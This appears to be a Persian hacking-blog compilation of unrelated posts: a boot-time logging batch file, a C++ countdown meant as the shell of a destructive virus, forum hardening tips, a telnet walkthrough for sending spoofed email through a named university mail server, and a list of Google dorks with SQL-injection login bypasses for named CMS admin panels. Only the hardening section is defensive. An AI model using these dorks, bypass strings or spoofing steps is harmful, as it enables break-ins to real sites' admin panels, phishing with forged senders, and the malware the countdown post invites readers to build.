ϐłᾄƈќ Ɠђὄṩҭṩ

سایت گوگل یکی از بزرگترین موتور های جستجوگر جهتن میباشد و نکات ظریفی دارد.

صفحه نخست موتور جستجو گوگل را باز و یکی از کلید واژه‌های tilt یا askew را در آن جستجو کنید. خواهید دید که نتایج جستجو به شکلی جالب کمی کج و مورب به شما نمایش داده خواهید شد.

به نام خدا

سلام دوستان، در این پست قصد دارم، با یه تکه کد ساده، کاری کنیم تا هرموقع سیستمتون روشن شد، تاریخ و ساعت روشن شدنش توو یه فایل متنی ذخیره بشه، تا اگه کاربرای دیگه هم از سیستمتون استفاده کردن، بفهمین چه ساعت و تاریخی این کارو کردن. در واقع مثل یه جاسوس بهمون گزارش میده!

خب اول یه فایل نت پد درست کنید و کد زیر رو تووش پیست کنید:

 echo * Time: ℅time℅ *** Date: ℅date℅ * >> "D:\Report.doc" 

خب حالا با پسوند bat. سیو کنید.
و این فایلو توو استارت آپ کپی کنید.
برای باز کردن پوشه استارت آپ کلیک کنید،  یا توو RUN تکه کد زیر رو بنویسید:

Shell:Startup

حالا اون فایل بات رو توو این پوشه کپی کنید.
حالا اگه سیستم رو ری استارت بدین، می بینید که یه فایل متنی وردWordبه اسم Report.doc توو درایو D ایجاد شده و تاریخ و ساعت روشن شدن سیستمتون تووش نوشته و به ازای هر بار خاموش و روشن کردن، تاریخ و ساعت توو همین فایل ثبت میشه.

شاید تو بعضی از برنامه های کاربردی یا مخرب و . دیده باشین که برنامه داره یه تایمری رو نشون میده که وقتی اون تایمر به پایان برسه ، خدا میدونه چه سرنوشت خوب یا شومی در انتظار سیستمتونه :)

توی این پست قراره یه همچین چیزی رو به زبان سی پلاس پلاس بنویسیم که مطمئنم با خوندن کد ها ، براحتی میتونین همچین برنامه ای رو به زبان های دیگه بنویسین ( فقط کافیه یه خرده با کد ها آشنا باشین )

اول از همه یه پروژه جدید به زبان سی پلاس پلاس با هر اسمی که دلتون میخواد ایجاد کنین
اگه از ویژوال استودیو استفاده میکنین ، از کدهای پایین استفاده کنین :

#include<iostream>
#include<windows.h>

usingnamespace std;

int main()
{
    system("Color FC");

    for(int h =23; h >=0; h--)
    {
        for(int m =59; m >=0; m--)
        {
            for(int s =59; s >=0; s--)
            {
                cout << h <<':'<< m <<':'<< s << endl;
                cout <<"Join => Http://ViRus32.Blog.IR ;D "<< endl;
                Sleep(1000);
                system("Cls");
            }
        }
    }
}

و اگه از ابزارای دیگه مثل کد بلاکس و . استفاده میکنین ، باید از کد پایین استفاده کنین :

#include<iostream>
#include<windows.h>

usingnamespace std;

int main()
{
    system("Color FC");

    for(int h =23; h >=0; h--)
    {
        for(int m =59; m >=0; m--)
        {
            for(int s =59; s >=0; s--)
            {
                cout << h <<':'<< m <<':'<< s << endl;
                cout <<"Join => Http://ViRus32.Blog.IR ;D "<< endl;
                Sleep(1000);
                system("Cls");
            }
        }
    }
}

پروژتونو کامپایل کنین تا بدونین برنامه دقیقا چیکار میکنه
کد ها هم که دیگه توضیح نداره :)
در واقع ما از حلقه های تو در تو استفاده کردیم و در نهایت در حلقه ی آخر دستور چاپ شدن ساعت و دقیقه و ثانیه رو دادیم
بطور کلی نحوه ی کار کرد حلقه های تو در تو به این شکل هستش که یک بار حلقه اول اجرا میشه و بعدا حلقه داخلش + دستورات موجود داخل آکولادش اجرا میشه
بعدا میره سراغ تکرار دومین بار و مجددا وقتی وارد دستوراتش میشه ، میاد و حلقه ی داخلش رو + دستورات اجرا میکنه
این حلقه اونقدر اجرا میشه تا شرط حلقه ی اول برابر صفر بشه و از حلقه خارج بشه ، یا اینکه یه شرط خاصی رو انجام بده .
ضمنا کدهایی که قرار دادم به چیزی آسیب نمیزنه و فقط برای نشون دادن ساعت باقی مونده هستش که کاربر چند ساعت مهلت فرار کردن داره :d
اما شما برای اینکه این کدهارو تبدیل به کدهای مخرب کنین میتونین شرط بزارین که مثلا وقتی h یا همون ساعت برابر با صفر شد 
برنامتون بیاد و دستورات موجود در این پست و این پست که مربوط به ویروس نویسی توی سی پلاس پلاس هستش رو اجرا کنه
یا اینکه میتونین از دستورات خط فرمان استفاده کنین که برای دیدن تکه کد های ساده میتونین به اینجا سر بزنین
کاربر میتونه برنامه رو ببنده که بزودی نحوه ی جلوگیری از اینکار رو براتون مینویسم
در آخر هم اینکه سعی کنین مهلت فرار کاربر رو پایین تر از 24 ساعت بیارین :) 
چون کاربر میتونه راحت فرار کنه ( البته اگه پاش گیر نباشه ) 
مثلا نیم ساعت یا فوقش یک ساعت و

موفق باشید

برای اینکه امنیت انجمن IPB خودتون رو بالا ببرید این راه حل ها کاربردی هستند

ولی در دنیای اینترنت هیچ چیز ایمن و خصوصی نخواهد ماند و به یاد داشته باشید

امنیت مساله ای نسبی است.

1.  
2. Tools & Settings > System Settings > System > Security and Privacy >> Display IPB version on your site
3.  

 گزینه خیر را تیک بزنید

۲٫ در بطن برنامه IPB قسمت مدیریت امنیتی تعبیه شده است که با مراجعه به آن در وقت خود صرفه جویی کرده و امنیت سایت خودتان را بالا خواهید برد.

در ورژن های ۳٫۰ و ۳٫۱

1.  
2. System > Security Center
3.  

این بخش ها را حتما run کنید

1.  
2. IP.Board PHP/CGI .htaccess Protection
3. Make "conf_global.php" Un-writable
4. IP.Board ACP .htaccess Protection
5.  

 – در ” IP.Board ACP .htaccess Protection‌” شما باید یک نام عبوری و رمز برای‌ ورود به صفحه ورودی مدیریت ایجاد کنید تا دسترسی به صفحه مدیریت سخت تر میشود !

۳٫ حتما نام پوشه admin را تغییر دهید. به همین منظور شما باید فایل initdata.php را باز نموده و این قسمت را پیدا کنید

از ورژن ۲٫۰ تا ۳٫۱٫۴ به این شیوه بوده

1.  
2. * The name of the CP directory
3. * @since 2.0.0.2005-01-01
4. */
5.  

 define( ‘CP_DIRECTORY’, ‘admin’ );در اینجا admin را باید تغییر دهید به همین منظور شما نام پوشه تغییر داده شده admin را در این قسمت مینویسید ( دقت کنید که شما هم باید نام پوشه admin تغییر دهید و هم در این فایل نام تغییر داده شده را گزارش کنید)

مثال :

من پوشه admin خود را در Cpanel از admin به jojo تغییر دادم به همین خاطر باید فایل initdata.php رو باز کنم و نام admin رو به jojo تغییر بدم. — بسیار ساده بود

۴٫ حتما از کد های .htaccess برای پشتیبانی از فایل های initdata.php و conf_global.php استفاده کنید نمونه کد که در اون از صفحه خطا استفاده شده

1.  
2. # Protect the conf_global.php file
3. <files conf_global.php>
4. ErrorDocument 403 http://www.yourwebsite.org/403.html
5. Order deny,allow
6. deny from all
7. </files>
8. # Protect the initdata.php file
9. <files initdata.php>
10. ErrorDocument 403 http://www.yourwebsite.org/403.html
11. Order deny,allow
12. deny from all
13. </files>
14.  

 ۵٫ اگر از Cpanel استفاده میکنید برای پوشه های مهم حتما تنظیمات حفاظتی را مد نظر بگیرید Password Protect Directory”

۶٫ از کلمات عبوری استفاده کنید که حدس آن بسیار مشکل باشد کلمات عبوری بالای ۱۵ کاراکتر بسیار عالی هستند و حتما از کاراکتر های مثل # { : } ] ; ! % @ و اعداد در کنار حروف استفاده کنید !

۷٫ شما میتوانید بعد از انجام مرحله ۳ یک پوشه با نام admin ساخته و یک صفحه با ظاهر قسمت مدیریت IPB ایجاد کنید و از طریق cPanel هاست خود، برای پوشه مورد نظر رمزی قرار دهید.

۸٫ حتما برنامه خود را بروز نگه دارید و از بسته ای امنیتی که IPS برای محصولات خودش ارائه میدهد استفاده کنید و در صورتی که کد های انجمن خود را ویرایش نمیکنید( دلخواه میباشد) بعد از ۱ یا ۲ ماه دوباره فایل های اصلی را از سایت IPS دانلود و نصب کنید. (به این خاطر که بعد از چند هفته برخی از باگ های گزارش شده در همان ورژن برطرف میشود)

ابزار مطرح و قوی در زمینه ی ھک و امنیت و نفوذ بوده و ھست
و فکر نکنم به این زودی ھا ھم قدیمی شه
احتمالا خیلی ھاتون تا حالا اسم این برنامه محبوب رو شنیدین و خیلی ھا تون ھم میدونید که این برنامه در کاربرد عملی از وسعت زیادی برخورداره
در این پست قراره با یکی دیگه از کاربردھای این برنامه آشنا شیم

البته ابتدا باید تلنت تون رو فعال کنید

استفاده از تلنت به خودیه خود جرم نیست
ولی یادتون باشه سواستفاده از این برنامه ممکنه دردسرھای بزرگی براتون داشته باشه
از توضیحات ساده و ابتدایی چشم پوشی میکنم تا پست خسته کننده نباشه
ھمونطور که در عنوان پست ھم نوشتم قراره در این پست ارسال ایمیل جعلی به کمک تلنت رو بررسی کنیم.
در ابتدا بھتره با پورت ھای پر کاربرد آشنایی ھایی داشته باشیم
برای مثال پورت 80 برای تبادل اطلاعات سایت ھا با سیستم شما استفاده میشه
اینو بزارین گوشه ذھنتون در درس بعدی قراره ازش استفاده کنیم
از پورت 25 ھم برای ارسال و دریافت ایمیل SMTPاستفاده میشه که در این آموزش ما بھش نیاز داریم
برای ارسال یا دریافت ایمیل ما نیازمند یک سرور ایمیل نیز ھستیم
برای مثال من از سایت زیر استفاده میکنم

شما از سایت های دیگه ای استفاده کنید 

mail.iasbs.ac.ir

خوب حالا بریم سر دستوراتمون
توی سی ام دی دستور زیر رو دارد کنید تا وارد تلنت بشیم

telnet mail.iasbs.ac.ir 25

سپس با دستور زیر شروع به کار میکنیم

Helo

و یا

Ehelo

که جلوی helo بھتره آدرس ایمیل فرستنده رو بنویسیم که میتونیم اصلا چیزی ننویسیم یا ھر آدرس ایمیلی که بخواییم رو بنویسیم!!!

Helo clnor@gmail.com

بعد از گرفتن جواب سلاممون برای ارسال ایمیل از دستور زیر استفاده میکنیم

Mail from Clnor@gmail.com

ما میتونیم آدرس ایمیل خودمون رو اینجا ھم ثبت نکنیم!!!
بعد از گرفتن اوکی گیرنده رو مشخص میکنیم

Rctp to : yusef_sh@yahoo.com

اینبار ھم بعد از گرفتن دستور
data
اینتر را دوباره میزنیم
سرویس دھنده ازتون دستور زیر رو میخواد

<CRLF>.<CRLF>

که این یعنی یبار اینتر رو بزن بعد یه نقطه تایپ کن و دوباره اینتر بزن!!!
حالا نوبت میرسه به

Subject
to
from

که اینجا لازم نیست قسمت to و From رو کامل کنیم
چون قراره ایمیل جعلی بفرستیم
در کل در قسمت ھای to میتونیم  آدرس گیرنده رو به دلخواه بنویسیم
و در قسمت From آدرس خودمون یا ھر آدرس دلبخواھی رو بنویسیم
تو قسمت Subject ھم متن ایمیل رو وارد میکنیم
به دستورات زیر دقت کنید
در این دستورات من تمام قسمت ھارو تکمیل میکنم!

1.  
2. data
3. from : clnor@gmail.com
4. to : yusef_sh@yahoo.com
5. Subject : salam
6. .

این دستورات برای ھر میزبانی کار میکنه

این پست  دورک های برای بایپس پنل های میزارم

1560 bypass admin page Vulnerability
Google Dork: inurl:cp.php?cl=cp
Date: 28 Jan 2016

'User:'=' 'or' PW:'=' 'or

admin path : /admin/

Google Dork: intext:"Powered By Mind Wave Softwares"
Username: '=' 'OR'
 Password: '=' 'OR'
admin path : /admin/

Designed by e-quota.net bypass adminpage Vulnerability
intext:"Design and Support by e-quota.net"
Username : '=''or'
 Password : '=''or'
admin path /admin/login.php

re-compile CMS Bypass Admin Login
Google Dork :"powered by re-compile"
Username : '=''or' Password : '=''or'
admin path /admin/login.php

Dashboard CMS - Admin Login Bypass
 Google Dork: "Sign in to start your session" inurl:admin/login.php
Google Dork:: 2 => "Sign in to start your session"
Username : '=''or' Password : '=''or'
admin path /admin/login.php

Google dork : Dork="by Torchlight Productions" "Admin

bypass admin page with '=''or'

XCOMM Admin Page Bypass
Google Dork : "Designed & Developed by: XCOMM"
Username : '=''or' Password : '=''or'admin path /admin/login.php

  Seawind Solution Bypass Admin Page Vulnerability
 intext:"Design & Developed By Seawind Solution Pvt.Ltd."
Username : '=''or' Password : '=''or'
admin path : /adminpanel/index.php